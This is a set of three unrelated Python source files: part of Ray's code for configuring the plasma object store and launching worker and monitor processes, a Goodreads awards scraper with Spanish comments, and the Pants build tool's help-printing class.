"RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] return command def determine_plasma_store_config(object_store_memory, plasma_directory=None, huge_pages=False): """Figure out how to configure the plasma object store. This will determine which directory to use for the plasma store. On Linux, we will try to use /dev/shm unless the shared memory file system is too small, in which case we will fall back to /tmp. If any of the object store memory or plasma directory parameters are specified by the user, then those values will be preserved. Args: object_store_memory (int): The object store memory to use. plasma_directory (str): The user-specified plasma directory parameter. huge_pages (bool): The user-specified huge pages parameter. Returns: The plasma directory to use. If it is specified by the user, then that value will be preserved. """ if not isinstance(object_store_memory, int): object_store_memory = int(object_store_memory) if huge_pages and not (sys.platform == "linux" or sys.platform == "linux2"): raise ValueError("The huge_pages argument is only supported on " "Linux.") system_memory = ray._private.utils.get_system_memory() # Determine which directory to use. 
By default, use /tmp on MacOS and # /dev/shm on Linux, unless the shared-memory file system is too small, # in which case we default to /tmp on Linux. if plasma_directory is None: if sys.platform == "linux" or sys.platform == "linux2": shm_avail = ray._private.utils.get_shared_memory_bytes() # Compare the requested memory size to the memory available in # /dev/shm. if shm_avail > object_store_memory: plasma_directory = "/dev/shm" elif (not os.environ.get("RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE") and object_store_memory > ray_constants.REQUIRE_SHM_SIZE_THRESHOLD): raise ValueError( "The configured object store size ({} GB) exceeds " "/dev/shm size ({} GB). This will harm performance. " "Consider deleting files in /dev/shm or increasing its " "size with " "--shm-size in Docker. To ignore this warning, " "set RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE=1.".format( object_store_memory / 1e9, shm_avail / 1e9)) else: plasma_directory = ray._private.utils.get_user_temp_dir() logger.warning( "WARNING: The object store is using {} instead of " "/dev/shm because /dev/shm has only {} bytes available. " "This will harm performance! You may be able to free up " "space by deleting files in /dev/shm. If you are inside a " "Docker container, you can increase /dev/shm size by " "passing '--shm-size={:.2f}gb' to 'docker run' (or add it " "to the run_options list in a Ray cluster config). Make " "sure to set this to more than 30% of available RAM.". format(ray._private.utils.get_user_temp_dir(), shm_avail, object_store_memory * (1.1) / (2**30))) else: plasma_directory = ray._private.utils.get_user_temp_dir() # Do some sanity checks. if object_store_memory > system_memory: raise ValueError( "The requested object store memory size is greater " "than the total available memory.") else: plasma_directory = os.path.abspath(plasma_directory) logger.info("object_store_memory is not verified when " "plasma_directory is set.") if not os.path.isdir(plasma_directory): raise ValueError(f"The file {plasma_directory} does not " "exist or is not a directory.") if huge_pages and plasma_directory is None: raise ValueError("If huge_pages is True, then the " "plasma_directory argument must be provided.") if object_store_memory < ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES: raise ValueError("Attempting to cap object store memory usage at {} " "bytes, but the minimum allowed is {} bytes.".format( object_store_memory, ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES)) # Print the object store memory using two decimal places. logger.debug( "Determine to start the Plasma object store with {} GB memory " "using {}.".format( round(object_store_memory / 10**9, 2), plasma_directory)) return plasma_directory, object_store_memory def start_worker(node_ip_address, object_store_name, raylet_name, redis_address, worker_path, temp_dir, raylet_ip_address=None, stdout_file=None, stderr_file=None, fate_share=None): """This method starts a worker process. Args: node_ip_address (str): The IP address of the node that this worker is running on. object_store_name (str): The socket name of the object store. raylet_name (str): The socket name of the raylet server. redis_address (str): The address that the Redis server is listening on. worker_path (str): The path of the source code which the worker process will run. temp_dir (str): The path of the temp dir. raylet_ip_address (str): The IP address of the worker's raylet. If not provided, it defaults to the node_ip_address. stdout_file: A file handle opened for writing to redirect stdout to. 
If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. Returns: ProcessInfo for the process that was started. """ command = [ sys.executable, "-u", worker_path, "--node-ip-address=" + node_ip_address, "--object-store-name=" + object_store_name, "--raylet-name=" + raylet_name, "--redis-address=" + str(redis_address), "--temp-dir=" + temp_dir, ] if raylet_ip_address is not None: command.append("--raylet-ip-address=" + raylet_ip_address) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_WORKER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, autoscaling_config=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0, monitor_ip=None): """Run a process to monitor the other processes. Args: redis_address (str): The address that the Redis server is listening on. logs_dir(str): The path to the log directory. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. autoscaling_config: path to autoscaling config file. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. monitor_ip (str): IP address of the machine that the monitor will be run on. Can be excluded, but required for autoscaler metrics. Returns: ProcessInfo for the process that was started. """ monitor_path = os.path.join(RAY_PATH, AUTOSCALER_PRIVATE_DIR, "monitor.py") command = [ sys.executable, "-u", monitor_path, f"--logs-dir={logs_dir}", f"--redis-address={redis_address}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if autoscaling_config: command.append("--autoscaling-config=" + str(autoscaling_config)) if redis_password: command.append("--redis-password=" + redis_password) if monitor_ip: command.append("--monitor-ip=" + monitor_ip) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_ray_client_server(redis_address, ray_client_server_port, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, server_type: str = "proxy", serialized_runtime_env: Optional[str] = None, session_dir: Optional[str] = None): """Run the server process of the Ray client. Args: ray_client_server_port (int): Port the Ray client server listens on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. server_type (str): Whether to start the proxy version of Ray Client. serialized_runtime_env (str|None): If specified, the serialized runtime_env to start the client server in. Returns: ProcessInfo for the process that was started. 
""" root_ray_dir = Path(__file__).resolve().parents[1] setup_worker_path = os.path.join(root_ray_dir, "workers", ray_constants.SETUP_WORKER_FILENAME) conda_shim_flag = ( "--worker-setup-hook=" + ray_constants.DEFAULT_WORKER_SETUP_HOOK) command = [ sys.executable, setup_worker_path, conda_shim_flag, # These two args are to use the shim process. "-m", "ray.util.client.server", "--redis-address=" + str(redis_address), "--port=" + str(ray_client_server_port), "--mode=" + server_type ] if redis_password: command.append("--redis-password=" + redis_password) if serialized_runtime_env: command.append("--serialized-runtime-env=" + serialized_runtime_env) if session_dir: command.append(f"--session-dir={session_dir}") process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAY_CLIENT_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info
import pandas as pd import time from bs4 import BeautifulSoup import requests import sys import random def get_headers(): """ Genera un diccionario con los datos del header. Incluye una lista de diferentes user agent de la cual elige uno de manera aleatoria. """ uastrings = [ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" ] headers = { "User-Agent": random.choice(uastrings), } return headers def get_categories(year): """ toma como entrada la url de los awards del año X y devuelve una lista de tuplas con el titulo de la categoria y la url del ganador y nominaciones de esta. Inputs: year: año de lectura Returns: list_cat: lista de tuplas (categoria, url) """ url_goodreads = 'https://www.goodreads.com' url_awards = f'{url_goodreads}/choiceawards/best-books-{year}' page_awards = requests.get(url_awards) soup_main = BeautifulSoup(page_awards.content, 'html.parser') elements = soup_main.find_all(class_ = 'category clearFix') list_cat = [] for elem in elements: element_category = elem.a.text.replace('\n', '') url_best_cat = f"{url_goodreads}{elem.a.get('href')}" list_cat.append((element_category, url_best_cat)) return list_cat def scrap_winner_page(winner_cat_url): """ Hace scraping a la pagina de la categoria y extrae el titulo, el numero de votos y la url (directorio) del libro. Inputs winner_cat_url: url de la pagina del ganador de categoria Returns: title: Titulo del libro num_votes: Numero de votos url_book: Directorio dentro de la url donde se encuentra la pagina del libro """ page_cat_winner = requests.get(winner_cat_url) soup_cat = BeautifulSoup(page_cat_winner.content, 'html.parser') title = soup_cat.find(class_ = 'winningTitle choice gcaBookTitle').text num_votes = int(soup_cat.find(class_ = 'greyText gcaNumVotes').text \ .replace(',', '') \ .replace('\n', '') \ .replace('votes', '')) url_book = soup_cat.find(class_ = 'winningTitle choice gcaBookTitle').get('href') return title, num_votes, url_book def get_databox(soup_book): """ Devuelve un diccionario con los datos del elemento databox de cada libro. 
Inputs: soup_book: elemento soup del libro Returns: dict_databox: diccionario con los resultados """ # leemos la tabla de boox data box: databox_key = soup_book.find('div' , id = 'bookDataBox').find_all('div', class_ = 'infoBoxRowTitle') databox_key = [elem.text.strip() for elem in databox_key] databox_value = soup_book.find('div' , id = 'bookDataBox').find_all('div', class_ = 'infoBoxRowItem') databox_value = [elem.text.strip() for elem in databox_value] dict_databox = {key:value for key, value in zip(databox_key, databox_value)} return dict_databox def load_data_category(cat_elem): """ Scrapea la url del libro ganador de una categoría y devuelve un diccionario con los datos Inputs: cat_elem: tupla de informacion [categoría, url] Returns: dict_book: Diccionario con la siguiente informacion: category: Categoria donde ha ganado el libro title: Titulo votes: Numero de votos author_name: Nombre del autor book_series: Saga a la que pertenece el libro rating_value: Puntuacion en goodreads num_ratings: Numero de valoraciones num_reviews: Numero de reviews list_genres: Lista de generos asociados al libro book_format: Formato del libro num_pages: Numero de paginas publish_date: Fecha de publicacion publisher: Editora de publicacion original_title: Titulo original isbn: ISBN edition_language: Idioma de la edicion setting: Lugar donde transcurre el libro num_awards: Numero de premios recibidos """ dict_book = {} url_goodreads = 'https://www.goodreads.com' name_cat = cat_elem[0] winner_cat_url = cat_elem[1] title, votes, url_book = scrap_winner_page(winner_cat_url) time.sleep(0.5) # ralentizar la velocidad de scrapeo url_book = f"{url_goodreads}{url_book}" dict_book['category'] = name_cat dict_book['title'] = title dict_book['votes'] = votes book_page = requests.get(url_book) soup_book = BeautifulSoup(book_page.content, 'html.parser') # autor try: author_name = soup_book.find(class_ = 'authorName').text except: author_name = soup_book.find(class_ = 'authorName')[0].text dict_book['author_name'] = author_name # book series try: book_series = soup_book.find('h2', id = "bookSeries").text.strip() except: # esto a lo mejor sobra # da error si no existe el valor de bookseries. 
se asigna None book_series = None # devuelve esto si no tiene serie # <h2 id="bookSeries"> # </h2> dict_book['book_series'] = book_series # rating numerico rating_value = soup_book.find(itemprop = "ratingValue").text.strip() dict_book['rating_value'] = rating_value # numero votaciones num_ratings = int(soup_book.find('meta' , itemprop = 'ratingCount') \ .text.strip() \ .split('\n')[0] \ .replace(',', '')) dict_book['num_ratings'] = num_ratings # numero reviews num_reviews = int(soup_book.find('meta' , itemprop = 'reviewCount') \ .text.strip() \ .split('\n')[0] \ .replace(',', '')) dict_book['num_reviews'] = num_reviews # generos de goodreads list_gen = [soup_tag.text for soup_tag in soup_book.find_all('a' , class_ = 'actionLinkLite bookPageGenreLink')] list_gen = '_'.join(list(dict.fromkeys(list_gen))) dict_book['list_genres'] = list_gen # tipo de tapa book_format = soup_book.find('span' , itemprop = 'bookFormat').text dict_book['book_format'] = book_format # numero de paginas num_pages = int(soup_book.find('span' , itemprop = 'numberOfPages') \ .text.split(' ')[0]) dict_book['num_pages'] = num_pages # fecha publicacion publish_date = soup_book.find('div' , id = 'details') \ .find_all('div', class_='row')[1] \ .text.strip().split('\n')[1] \ .strip() dict_book['publish_date'] = publish_date # nombre publicador publisher = soup_book.find('div' , id = 'details') \ .find_all('div', class_='row')[1] \ .text.strip() \ .split('\n')[2] \ .replace('by', '') \ .strip() dict_book['publisher'] = publisher # extraemos la tabla desplegable de informacion del libro databox = get_databox(soup_book) # titulo original try: original_title = databox['Original Title'] except: original_title = None dict_book['original_title'] = original_title # isbn si viene try: isbn = databox['ISBN'].split('\n')[0] except: # no esta en databox isbn = None dict_book['isbn'] = isbn # edition language try: edition_language = databox['Edition Language'] except: edition_language = None dict_book['edition_language'] = edition_language # setting try: setting = databox['Setting'] setting = setting.split('\n')[0].strip() except: setting = None dict_book['setting'] = setting # nº premios try: num_awards = len(databox['Literary Awards'] \ .replace('...more', ', ') \ .replace('\n', '') \ .replace('...less', '') \ .split(', ')) except: num_awards = None dict_book['num_awards'] = num_awards return dict_book if __name__ == '__main__': if len(sys.argv) == 1: print("[ERROR] Please give as input at least one year of data") else: year = int(sys.argv[1]) namefile = f'csv/goodreads_awards_{sys.argv[1]}.csv' print(f"[INFO] Reading awards data from year {year}...") list_cat = get_categories(year) dict_book_list = [] for cat_elem in list_cat: print(f"[INFO] + category: {cat_elem[0]}") dict_book_result = load_data_category(cat_elem) dict_book_list.append(dict_book_result) if len(dict_book_list) > 0: df_result_year = pd.DataFrame([pd.Series(elem) for elem in dict_book_list]) df_result_year['year'] = year print(f'[INFO] savng csv file: {namefile}') df_result_year.to_csv(namefile, index = False) else: print(f'[ERROR] year {year} not found')
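# --- Illustrative sketch (not part of the original script) ------------------
# The scraper above defines get_headers() but never passes those headers to
# its requests.get() calls. This is a minimal, hedged sketch of how the
# randomized User-Agent could be wired in; fetch_soup is a hypothetical
# helper name, not something the script defines.

import requests
from bs4 import BeautifulSoup


def fetch_soup(url, headers=None):
    """Download a page with optional headers and return its parsed soup."""
    response = requests.get(url, headers=headers, timeout=30)
    response.raise_for_status()  # fail loudly on HTTP errors
    return BeautifulSoup(response.content, 'html.parser')


# Example usage (assumes get_headers() from the script above is in scope):
# soup_main = fetch_soup('https://www.goodreads.com/choiceawards/best-books-2020',
#                        headers=get_headers())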
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).

import dataclasses
import difflib
import json
import textwrap
from typing import Dict, cast

from typing_extensions import Literal

from pants.base.build_environment import pants_version
from pants.help.help_formatter import HelpFormatter
from pants.help.help_info_extracter import AllHelpInfo, HelpJSONEncoder
from pants.help.maybe_color import MaybeColor
from pants.option.arg_splitter import (
    AllHelp,
    HelpRequest,
    NoGoalHelp,
    ThingHelp,
    UnknownGoalHelp,
    VersionHelp,
)
from pants.option.scope import GLOBAL_SCOPE


class HelpPrinter(MaybeColor):
    """Prints general and goal-related help to the console."""

    def __init__(
        self,
        *,
        bin_name: str,
        help_request: HelpRequest,
        all_help_info: AllHelpInfo,
        color: bool,
    ) -> None:
        super().__init__(color)
        self._bin_name = bin_name
        self._help_request = help_request
        self._all_help_info = all_help_info

    def print_help(self) -> Literal[0, 1]:
        """Print help to the console."""

        def print_hint() -> None:
            print(f"Use `{self.maybe_green(self._bin_name + ' help')}` to get help.")
            print(f"Use `{self.maybe_green(self._bin_name + ' help goals')}` to list goals.")

        if isinstance(self._help_request, VersionHelp):
            print(pants_version())
        elif isinstance(self._help_request, AllHelp):
            self._print_all_help()
        elif isinstance(self._help_request, ThingHelp):
            self._print_thing_help()
        elif isinstance(self._help_request, UnknownGoalHelp):
            # Only print help and suggestions for the first unknown goal.
            # It gets confusing to try and show suggestions for multiple cases.
            unknown_goal = self._help_request.unknown_goals[0]
            print(f"Unknown goal: {self.maybe_red(unknown_goal)}")
            did_you_mean = list(
                difflib.get_close_matches(
                    unknown_goal, self._all_help_info.name_to_goal_info.keys()
                )
            )
            if did_you_mean:
                print(f"Did you mean: {', '.join(self.maybe_cyan(g) for g in did_you_mean)}?")
            print_hint()
            return 1
        elif isinstance(self._help_request, NoGoalHelp):
            print("No goals specified.")
            print_hint()
            return 1
        return 0

    def _print_title(self, title_text: str) -> None:
        title = self.maybe_green(f"{title_text}\n{'-' * len(title_text)}")
        print(f"\n{title}\n")

    def _print_all_help(self) -> None:
        print(self._get_help_json())

    def _print_thing_help(self) -> None:
        """Print a help screen.

        Assumes that self._help_request is an instance of OptionsHelp.

        Note: Only useful if called after options have been registered.
""" help_request = cast(ThingHelp, self._help_request) things = set(help_request.things) if things: for thing in sorted(things): if thing == "goals": self._print_goals_help() elif thing == "targets": self._print_targets_help() elif thing == "global": self._print_options_help(GLOBAL_SCOPE, help_request.advanced) elif thing in self._all_help_info.scope_to_help_info: self._print_options_help(thing, help_request.advanced) elif thing in self._all_help_info.name_to_target_type_info: self._print_target_help(thing) else: print(self.maybe_red(f"Unknown entity: {thing}")) else: self._print_global_help() def _print_goals_help(self) -> None: goal_descriptions: Dict[str, str] = {} for goal_info in self._all_help_info.name_to_goal_info.values(): if goal_info.is_implemented: goal_descriptions[goal_info.name] = goal_info.description self._print_title("Goals") max_width = max((len(name) for name in goal_descriptions.keys()), default=0) chars_before_description = max_width + 2 def format_goal(name: str, descr: str) -> str: name = self.maybe_cyan(name.ljust(chars_before_description)) description_lines = textwrap.wrap(descr, 80 - chars_before_description) if len(description_lines) > 1: description_lines = [ description_lines[0], *(f"{' ' * chars_before_description}{line}" for line in description_lines[1:]), ] formatted_descr = "\n".join(description_lines) return f"{name}{formatted_descr}\n" for name, description in sorted(goal_descriptions.items()): print(format_goal(name, description)) specific_help_cmd = f"{self._bin_name} help $goal" print(f"Use `{self.maybe_green(specific_help_cmd)}` to get help for a specific goal.\n") def _print_global_help(self): def print_cmd(args: str, desc: str): cmd = self.maybe_green(f"{self._bin_name} {args}".ljust(50)) print(f" {cmd} {desc}") print(f"\nPants {pants_version()}") print("\nUsage:\n") print_cmd( "[option ...] [goal ...] [file/target ...]", "Attempt the specified goals on the specified files/targets.", ) print_cmd("help", "Display this usage message.") print_cmd("help goals", "List all installed goals.") print_cmd("help targets", "List all installed target types.") print_cmd("help global", "Help for global options.") print_cmd("help-advanced global", "Help for global advanced options.") print_cmd("help [target_type/goal/subsystem]", "Help for a target type, goal or subsystem.") print_cmd( "help-advanced [goal/subsystem]", "Help for a goal or subsystem's advanced options." ) print_cmd("help-all", "Print a JSON object containing all help info.") print("") print(" [file] can be:") print(f" {self.maybe_cyan('path/to/file.ext')}") glob_str = self.maybe_cyan("'**/*.ext'") print( f" A path glob, such as {glob_str}, in quotes to prevent premature shell expansion." ) print("\n [target] can be:") print(f" {self.maybe_cyan('path/to/dir:target_name')}.") print( f" {self.maybe_cyan('path/to/dir')} for a target whose name is the same as the directory name." ) print( f" {self.maybe_cyan('path/to/dir:')} to include all targets in the specified directory." ) print( f" {self.maybe_cyan('path/to/dir::')} to include all targets found recursively under the directory.\n" ) print(f"Documentation at {self.maybe_magenta('https://www.pantsbuild.org')}") pypi_url = f"https://pypi.org/pypi/pantsbuild.pants/{pants_version()}" print(f"Download at {self.maybe_magenta(pypi_url)}") def _print_options_help(self, scope: str, show_advanced_and_deprecated: bool) -> None: """Prints a human-readable help message for the options registered on this object. 
Assumes that self._help_request is an instance of OptionsHelp. """ help_formatter = HelpFormatter( show_advanced=show_advanced_and_deprecated, show_deprecated=show_advanced_and_deprecated, color=self.color, ) oshi = self._all_help_info.scope_to_help_info.get(scope) if not oshi: return formatted_lines = help_formatter.format_options(oshi) goal_info = self._all_help_info.name_to_goal_info.get(scope) if goal_info: related_scopes = sorted(set(goal_info.consumed_scopes) - {GLOBAL_SCOPE, goal_info.name}) if related_scopes: related_subsystems_label = self.maybe_green("Related subsystems:") formatted_lines.append(f"{related_subsystems_label} {', '.join(related_scopes)}") formatted_lines.append("") for line in formatted_lines: print(line) def _print_targets_help(self) -> None: self._print_title("Target types") longest_target_alias = max( len(alias) for alias in self._all_help_info.name_to_target_type_info.keys() ) chars_before_description = longest_target_alias + 2 for alias, target_type_info in sorted( self._all_help_info.name_to_target_type_info.items(), key=lambda x: x[0] ): alias_str = self.maybe_cyan(f"{alias}".ljust(chars_before_description)) summary = target_type_info.summary or "<no description>" print(f"{alias_str}{summary}\n") specific_help_cmd = f"{self._bin_name} help $target_type" print( f"Use `{self.maybe_green(specific_help_cmd)}` to get help for a specific " f"target type.\n" ) def _print_target_help(self, target_alias: str) -> None: self._print_title(target_alias) tinfo = self._all_help_info.name_to_target_type_info[target_alias] if tinfo.description: print(tinfo.description) print("\nValid fields:") for field in sorted(tinfo.fields, key=lambda x: x.alias): print() print(self.maybe_magenta(field.alias)) indent = " " required_or_default = "required" if field.required else f"default: {field.default}" print(self.maybe_cyan(f"{indent}type: {field.type_hint}")) print(self.maybe_cyan(f"{indent}{required_or_default}")) if field.description: for line in textwrap.wrap(field.description, 80): print(f"{indent}{line}") print() def _get_help_json(self) -> str: """Return a JSON object containing all the help info we have, for every scope.""" return json.dumps( dataclasses.asdict(self._all_help_info), sort_keys=True, indent=2, cls=HelpJSONEncoder )